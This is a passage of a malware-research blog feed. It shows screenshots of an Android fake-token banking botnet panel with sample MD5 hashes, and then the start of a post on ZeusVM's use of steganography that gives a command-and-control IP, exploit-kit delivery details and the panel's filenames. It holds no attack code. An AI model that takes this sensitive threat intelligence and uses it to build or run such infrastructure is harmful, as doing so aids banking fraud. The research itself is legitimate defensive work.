&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCG5ndLNT3yXjXgBXcHgsNmJFaqCmMe-y6q-xWW-hNkGyZytK86NvuqqgAQnJE65Yn8jXTWwpCC0jRUEMP5UJ87WR1EQ72nPC5YGBrc7Ne_IPV8gzYzl7X3SYIzrRwgpw74FK6dCT-sQ/s1600/28-11-2013+21-17-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiCG5ndLNT3yXjXgBXcHgsNmJFaqCmMe-y6q-xWW-hNkGyZytK86NvuqqgAQnJE65Yn8jXTWwpCC0jRUEMP5UJ87WR1EQ72nPC5YGBrc7Ne_IPV8gzYzl7X3SYIzrRwgpw74FK6dCT-sQ/s400/28-11-2013+21-17-31.png&quot; height=&quot;226&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bots:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFqvKbtBXkJuw12emDH7weFZcR8fESuYkn70u7wxBE8-krBpkMd-f7gkpitqaHKDQQeCzjGpDW9CfAey_MRBuMhJ5TaCdn9zinGuqLIvluWxeLmITEyAZFtQpGjq9hD4p-P0z9ckvkxo/s1600/28-11-2013+22-42-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFqvKbtBXkJuw12emDH7weFZcR8fESuYkn70u7wxBE8-krBpkMd-f7gkpitqaHKDQQeCzjGpDW9CfAey_MRBuMhJ5TaCdn9zinGuqLIvluWxeLmITEyAZFtQpGjq9hD4p-P0z9ckvkxo/s400/28-11-2013+22-42-48.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BxfVwKGsH0OMCrQl2FHXudi0HEplMzy5GrtB2f0zjSygUBqj2Doz4RZh2N7wUbp6zxc3HrAWnHvSvCW0-8psuhLiSVx3xk6VI-9771M8I-ORLkCYLWHXq_HmSmBLjJcpXxw15n234Vk/s1600/28-11-2013+23-49-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BxfVwKGsH0OMCrQl2FHXudi0HEplMzy5GrtB2f0zjSygUBqj2Doz4RZh2N7wUbp6zxc3HrAWnHvSvCW0-8psuhLiSVx3xk6VI-9771M8I-ORLkCYLWHXq_HmSmBLjJcpXxw15n234Vk/s400/28-11-2013+23-49-37.png&quot; height=&quot;372&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Passwords:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-TkR_bNrkR1CCU9PcCvkZ5yYI6zGE40gUwxekdTpZcnP_fO2neI7W9KjIFEZjI-I1fTMSkNwDFRKM9lHfFqNT1UUhptdjCDRYy5YP221CHEOK_CE8xe7GsOZXcZAqNg-x-i7C0unu0s/s1600/28-11-2013+23-50-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2-TkR_bNrkR1CCU9PcCvkZ5yYI6zGE40gUwxekdTpZcnP_fO2neI7W9KjIFEZjI-I1fTMSkNwDFRKM9lHfFqNT1UUhptdjCDRYy5YP221CHEOK_CE8xe7GsOZXcZAqNg-x-i7C0unu0s/s400/28-11-2013+23-50-28.png&quot; height=&quot;235&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Send a command:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhje_CMYqgPPVvcdyjhyKxsF_mYoTwQiOXQffFNY0NU7pBQE63A7ZS6aExapCHTSS4FC-Yldmb92l2V0QYhQGAOjgFDtxJmwyTwIWnPpYCPEkgoySCmgYvIYmy7YIa-Yemyopv5YahhIE8/s1600/28-11-2013+23-50-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhje_CMYqgPPVvcdyjhyKxsF_mYoTwQiOXQffFNY0NU7pBQE63A7ZS6aExapCHTSS4FC-Yldmb92l2V0QYhQGAOjgFDtxJmwyTwIWnPpYCPEkgoySCmgYvIYmy7YIa-Yemyopv5YahhIE8/s400/28-11-2013+23-50-45.png&quot; height=&quot;223&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Commands sent:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTVrQNhrBNdTNd3JFD1ij4FmZW-drms_8OqKMvgQ5b5nJPrcO15814XhyphenhyphenyD-S1ewtTOSEYQ92k4vlR6wNx00Bnz7o_v2hLWuo3riv7ss1xAkbfLjTdhnKgwPusQ_vuxLpO2iBd2e3tEY/s1600/28-11-2013+23-47-33.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTVrQNhrBNdTNd3JFD1ij4FmZW-drms_8OqKMvgQ5b5nJPrcO15814XhyphenhyphenyD-S1ewtTOSEYQ92k4vlR6wNx00Bnz7o_v2hLWuo3riv7ss1xAkbfLjTdhnKgwPusQ_vuxLpO2iBd2e3tEY/s400/28-11-2013+23-47-33.png&quot; height=&quot;226&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Apps:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYy18mwUick97vBupUwbzDjM2splMJctJqPFiX75isNO0Jt3yr4UCis0p3ic37jecr-P2g0p6Yu_a3NUjPyakIntitXZMRvmuMX1cigcyJQRnkkjpkXqjL7qQSRFF7wOZkX_Xjt5PtDt8/s1600/28-11-2013+23-47-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYy18mwUick97vBupUwbzDjM2splMJctJqPFiX75isNO0Jt3yr4UCis0p3ic37jecr-P2g0p6Yu_a3NUjPyakIntitXZMRvmuMX1cigcyJQRnkkjpkXqjL7qQSRFF7wOZkX_Xjt5PtDt8/s400/28-11-2013+23-47-48.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Apps builder:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NeHjulfahNlgtSRa99xajePgWuKejMD05RRvEGQhR71H1EG1HgbyYHc78W_nUDT0eqHQxaHGmwN9gHnxCe2OTDCEVfbEHGsYfELoGh3XHxncfJ73F2D8xnFhjN1VNxrN-irUjEDHoeI/s1600/28-11-2013+23-48-10.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NeHjulfahNlgtSRa99xajePgWuKejMD05RRvEGQhR71H1EG1HgbyYHc78W_nUDT0eqHQxaHGmwN9gHnxCe2OTDCEVfbEHGsYfELoGh3XHxncfJ73F2D8xnFhjN1VNxrN-irUjEDHoeI/s400/28-11-2013+23-48-10.png&quot; height=&quot;335&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
MD5s:&lt;br /&gt;
2d4770137ae0b91446fc2f99d9fdb2b0&lt;br /&gt;
f629adcfbcdd4622ad75337ec0b1a0ff&lt;br /&gt;
dd4ac55df6500352dd2cad340a36a40f&lt;br /&gt;
b9f9614775a54aa42f94eedbc4796446&lt;br /&gt;
1fababfd02ea09ae924cd0a7dbfb708c&lt;br /&gt;
bc8394bc9c6adbcfca3d450ee4ede44a&lt;br /&gt;
1cb87e1716c503bf499e529ee90e5b31&lt;br /&gt;
6db5cdd2648fcd445481cdfa2f2b065a&lt;br /&gt;
2ad6f8b8e4aaf88b024e1ddb99833b79&lt;br /&gt;
8bac185b6aff0bec4686b7f4cb1659c8&lt;br /&gt;
&lt;br /&gt;
App settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxSQLrwee4v3lgZzXjuSFHLHA3eY-tSWfaCl-6az7zYHPIIypDYfxV6aDut1wcaLhBwF8KUhn3unO55r1gtDIkO6jB8mikbMT8npSSuk0ZnhdsteyiXB7nij6eqvyPBbJOl2H4iH_6m8/s1600/28-11-2013+23-48-27.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxxSQLrwee4v3lgZzXjuSFHLHA3eY-tSWfaCl-6az7zYHPIIypDYfxV6aDut1wcaLhBwF8KUhn3unO55r1gtDIkO6jB8mikbMT8npSSuk0ZnhdsteyiXB7nij6eqvyPBbJOl2H4iH_6m8/s400/28-11-2013+23-48-27.png&quot; height=&quot;230&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEUPcCp6mslti4nOG62l4l-QXakL50Jedbo1W4XiZGCbmQgVCfEASiiQ5Y2Ly9PQJk2tyeyH0cYGmbgCNwrrqaL1OS0ai3-aL2VuPxNNn3Xzxk4HG5UpEXZHIKCpWPAl7RoQMN7HKFAic/s1600/28-11-2013+23-48-55.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEUPcCp6mslti4nOG62l4l-QXakL50Jedbo1W4XiZGCbmQgVCfEASiiQ5Y2Ly9PQJk2tyeyH0cYGmbgCNwrrqaL1OS0ai3-aL2VuPxNNn3Xzxk4HG5UpEXZHIKCpWPAl7RoQMN7HKFAic/s400/28-11-2013+23-48-55.png&quot; height=&quot;230&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Second panel, a bit different, look like a &#39;test&#39; one.&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfwMPHoZvhZimr5jWePoM5TVkVGfQfYRs9OIW3qAjMPjb-joZn__CSjxiWwDtWETkVXdZCuCJK2pkuIoTgB-EULHx2jnZwXUx4u4LerhAfF1-_8uke4WW0GOJ1nzogkoNoUq2k_C2cEA/s1600/01-12-2013+16-10-54.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQfwMPHoZvhZimr5jWePoM5TVkVGfQfYRs9OIW3qAjMPjb-joZn__CSjxiWwDtWETkVXdZCuCJK2pkuIoTgB-EULHx2jnZwXUx4u4LerhAfF1-_8uke4WW0GOJ1nzogkoNoUq2k_C2cEA/s400/01-12-2013+16-10-54.png&quot; height=&quot;162&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Phone:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht6QxR_kUi4F451IFeIeBGgd0iXoqTbcTol5luVgFMMU25IAkTYyLDY9Ep66LpDMCtWK18jHS7jujjeQyf-8s5JXA1sMVSNtYDn_VkgLxWVL5naN3uprtQ28pA6S4JqJ-l6Yhf8MISR4o/s1600/01-12-2013+16-14-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht6QxR_kUi4F451IFeIeBGgd0iXoqTbcTol5luVgFMMU25IAkTYyLDY9Ep66LpDMCtWK18jHS7jujjeQyf-8s5JXA1sMVSNtYDn_VkgLxWVL5naN3uprtQ28pA6S4JqJ-l6Yhf8MISR4o/s400/01-12-2013+16-14-17.png&quot; height=&quot;162&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Phone search:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX9buLw1gap0b4RzvxcrUH3tQbdJGLk7GtA5noUf6q-td3ucFQaWWq7Jcer87CWmkLSZ581bYRqjDZuIsvZ-eUhuSzE1vnyN0FeN4nHQxiw_SvQcLE7cqQRqC5dK0FsbFB5aeXNAihYyo/s1600/01-12-2013+16-15-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX9buLw1gap0b4RzvxcrUH3tQbdJGLk7GtA5noUf6q-td3ucFQaWWq7Jcer87CWmkLSZ581bYRqjDZuIsvZ-eUhuSzE1vnyN0FeN4nHQxiw_SvQcLE7cqQRqC5dK0FsbFB5aeXNAihYyo/s400/01-12-2013+16-15-04.png&quot; height=&quot;180&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5xqI3htNP-_3esuK1OMM9e026iq-Iskg3RdfVmKwJ1yWvt3Hgs74br-5uV3dmeKlSzd-J1tmaSHc-ZEaKVhdad82MrPLp1N3AYGQqIO_9CmOWWYVIaPVpFIrjUeY1abuUIVV9RUce7k/s1600/01-12-2013+16-17-38.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5xqI3htNP-_3esuK1OMM9e026iq-Iskg3RdfVmKwJ1yWvt3Hgs74br-5uV3dmeKlSzd-J1tmaSHc-ZEaKVhdad82MrPLp1N3AYGQqIO_9CmOWWYVIaPVpFIrjUeY1abuUIVV9RUce7k/s400/01-12-2013+16-17-38.png&quot; height=&quot;162&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
RSA Security talked also about it &lt;a href=&quot;https://blogs.rsa.com/behind-scenes-fake-token-mobile-app-operation/&quot;&gt;here&lt;/a&gt;</description><link>https://www.xylibox.com/2014/04/androidfaketokena.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bf6LrIl99slYpJGtwaHTxAbshCD16vntPzsszqJqklEIs0q9d8wYIOsYp6n1uZ7nu063PM-sCkXDhZKqhK_IxItV0lbVrwrLB7s0GgWm2jiRpphzM9UmRz7KlXF8ZZ7nxhZQe28ECW0/s72-c/28-11-2013+21-15-57.png" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-7386495101173450124</guid><pubDate>Sun, 13 Apr 2014 19:20:00 +0000</pubDate><atom:updated>2014-04-13T22:35:22.753+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">1.0.0.2</category><category domain="http://www.blogger.com/atom/ns#">1.0.0.5</category><category domain="http://www.blogger.com/atom/ns#">Nuclear Exploit Pack</category><category domain="http://www.blogger.com/atom/ns#">Steganography</category><category domain="http://www.blogger.com/atom/ns#">SUTRA</category><category domain="http://www.blogger.com/atom/ns#">ZeusVM</category><title>ZeusVM and steganography</title><description>Months ago, researchers observed an evolution of ZeusVM, time to get back on this family.&lt;br /&gt;
&lt;br /&gt;
For informations,&lt;br /&gt;
The first ZeusVM sample i&#39;ve seen using steganography was the 21 November 2013.&lt;br /&gt;
The IP of the C&amp;amp;C have Russian origin: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/212.44.64.202/information/&quot;&gt;212.44.64.202&lt;/a&gt; &lt;br /&gt;
A Sutra TDS who redirect on Nuclear Exploit pack was pushing the payload, Roman of abuse.ch blacklisted 212.44.64.202 one month later on his &lt;a href=&quot;https://zeustracker.abuse.ch/monitor.php?host=212.44.64.202&quot;&gt;Zeus tracker&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
The first guy who publicly wrote about ZeusVM change is probably Jerome Segura of &lt;a href=&quot;http://blog.malwarebytes.org/security-threat/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/&quot;&gt;Malwarebytes&lt;/a&gt;.&lt;br /&gt;
Actually the latest version i&#39;ve saw in the wild is 1.0.0.5, and if you want a hash: e4c31d18b92ad6e19cb67be2e38c3bd1 (sample is fresh of today)&lt;br /&gt;
&lt;br /&gt;
Let&#39;s have a look on the first server that i&#39;ve see now... 212.44.64.202.&lt;br /&gt;
Pony, Multilocker, Mailers, Grum and an older version of ZeusVM (without steganography) was also hosted on this server but that not the topic.&lt;br /&gt;
&lt;br /&gt;
The filename of login scripts and ZeusVM configs were hardnamed in russian, like:&lt;br /&gt;
borodinskoesrajenie.jpg (http://en.wikipedia.org/wiki/Battle_of_Borodino)&lt;br /&gt;
vhodtolkodlyaelfov.php (only elves can enter)&lt;br /&gt;
logovoelfov.php (elf&#39;s den)&lt;br /&gt;
domawniypitomec.php (domestic animal)&lt;br /&gt;
jivotnoe.php (animal)&lt;br /&gt;
larecotkryt.php (the chest is open)&lt;br /&gt;
And so on.. overall the panel design seem back to the original zeus style (not like the previous &#39;generation&#39; of ZeusVM with casper)&lt;br /&gt;
&lt;br /&gt;
/kec/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjskgkmq1Ur6-adBTRJZ_MtOPQ2atkCH_xXUJhI5y27lWi9I9_sNBfZ-6vZjHTaK1vuXfIh1IA-Ip-l8irPmteIEnRciBP_HlfSpKk1O8rePVx3o9ZW3lXKLKq3eBcKh9-geCsjsGlb7kA/s1600/16-02-2014+16-30-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjskgkmq1Ur6-adBTRJZ_MtOPQ2atkCH_xXUJhI5y27lWi9I9_sNBfZ-6vZjHTaK1vuXfIh1IA-Ip-l8irPmteIEnRciBP_HlfSpKk1O8rePVx3o9ZW3lXKLKq3eBcKh9-geCsjsGlb7kA/s1600/16-02-2014+16-30-34.png&quot; height=&quot;400&quot; width=&quot;290&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjLZh5NilmyCk_2aXzOMVf1yz94XDVUcshJQVyjf52qLLbxkJJhd0RhViqdTpUPsWK0sQSdFRac8RQ19CXSRFgqkA-QowLqizF4o_YEgA45OHOdoL8wp-Pz5UGsHasqm1V14E4bLUsEE/s1600/16-02-2014+16-37-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjLZh5NilmyCk_2aXzOMVf1yz94XDVUcshJQVyjf52qLLbxkJJhd0RhViqdTpUPsWK0sQSdFRac8RQ19CXSRFgqkA-QowLqizF4o_YEgA45OHOdoL8wp-Pz5UGsHasqm1V14E4bLUsEE/s1600/16-02-2014+16-37-13.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/luck/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUlQ8Tw3EzKbrWwaykIp8Qxu4GCFlOherBqZ68wIteXMJAPb08hMqVI7eJrXH2kDYPpgRCsazR4PjSxJ1Q2C2C_VXxz98fVPXuKYuidisPK3T55YCYGEREOxQuvWvnn25_ixBtG7Zi3M/s1600/16-02-2014+16-39-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUlQ8Tw3EzKbrWwaykIp8Qxu4GCFlOherBqZ68wIteXMJAPb08hMqVI7eJrXH2kDYPpgRCsazR4PjSxJ1Q2C2C_VXxz98fVPXuKYuidisPK3T55YCYGEREOxQuvWvnn25_ixBtG7Zi3M/s1600/16-02-2014+16-39-29.png&quot; height=&quot;400&quot; width=&quot;380&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHtA_CUYTTHOCuxf5JZ7rvhcJGWP8-igdbQ90C9eoQIgFs52E55R5-OCSh_m5AhkWIC66_Plcse0NRaQigHH5XtlbpwkjIpgmz8a35vCFJQIW0VJWERffGsi21ehhQgY2XXsslmW1DeQ/s1600/16-02-2014+16-40-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFHtA_CUYTTHOCuxf5JZ7rvhcJGWP8-igdbQ90C9eoQIgFs52E55R5-OCSh_m5AhkWIC66_Plcse0NRaQigHH5XtlbpwkjIpgmz8a35vCFJQIW0VJWERffGsi21ehhQgY2XXsslmW1DeQ/s1600/16-02-2014+16-40-26.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/ass/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT70YPY2XQff06TpuNXPOsrexXf58LWYVzlLkrZ1-TDlg2JlOi3zIIV0FhCDCwoQvqzKg7JgkJvo5W2LttlUb7zsYiGgSVmqPuAKZrYrCa5iX3K4ELsR0iSYaxCYQ-ofO6G7xy6C8VfqU/s1600/16-02-2014+16-42-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT70YPY2XQff06TpuNXPOsrexXf58LWYVzlLkrZ1-TDlg2JlOi3zIIV0FhCDCwoQvqzKg7JgkJvo5W2LttlUb7zsYiGgSVmqPuAKZrYrCa5iX3K4ELsR0iSYaxCYQ-ofO6G7xy6C8VfqU/s1600/16-02-2014+16-42-43.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmggwqnzu7loOvquEd9yeIr_FNfxxR7Po3R4uiKhYENv7d46NDBbk1Dp6f7dVoCT1Y90XCLaN8e6NrxeRVLNvYeMdo37MP7QX8cVQ-x9zncpyFdZpxFBFEH6kbzbzSNAo0yLsj_FX1rY/s1600/16-02-2014+16-43-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmggwqnzu7loOvquEd9yeIr_FNfxxR7Po3R4uiKhYENv7d46NDBbk1Dp6f7dVoCT1Y90XCLaN8e6NrxeRVLNvYeMdo37MP7QX8cVQ-x9zncpyFdZpxFBFEH6kbzbzSNAo0yLsj_FX1rY/s1600/16-02-2014+16-43-23.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/kbot/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixyV5VGIy2KVLkmkVdJ0HS_akWS6HjK_xrgLWPtk_F3mBdgfpbtGZxEwKJIW9EIXcLfwllQ2gCPySoPTE5iT-lWc3BypXMXEcxusEyAiePyHxE1uuT3_Lkf0VCkBHsufLO3jD3O6Lxp5I/s1600/16-02-2014+16-46-00.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixyV5VGIy2KVLkmkVdJ0HS_akWS6HjK_xrgLWPtk_F3mBdgfpbtGZxEwKJIW9EIXcLfwllQ2gCPySoPTE5iT-lWc3BypXMXEcxusEyAiePyHxE1uuT3_Lkf0VCkBHsufLO3jD3O6Lxp5I/s1600/16-02-2014+16-46-00.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVF3b9m8VJ3EnERaqpkUlkawqFV1-LSqZSIkYws0rGMAyMFHPKwONDFNXjBeat-gT988SvncWGiwhbR7zGX3oN6rPq88Km9dV9GTDT75sUVnf-YZQp5X-764KVoZY0qDzFQCCa-xKJRL8/s1600/16-02-2014+16-47-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVF3b9m8VJ3EnERaqpkUlkawqFV1-LSqZSIkYws0rGMAyMFHPKwONDFNXjBeat-gT988SvncWGiwhbR7zGX3oN6rPq88Km9dV9GTDT75sUVnf-YZQp5X-764KVoZY0qDzFQCCa-xKJRL8/s1600/16-02-2014+16-47-31.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
/ksks/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
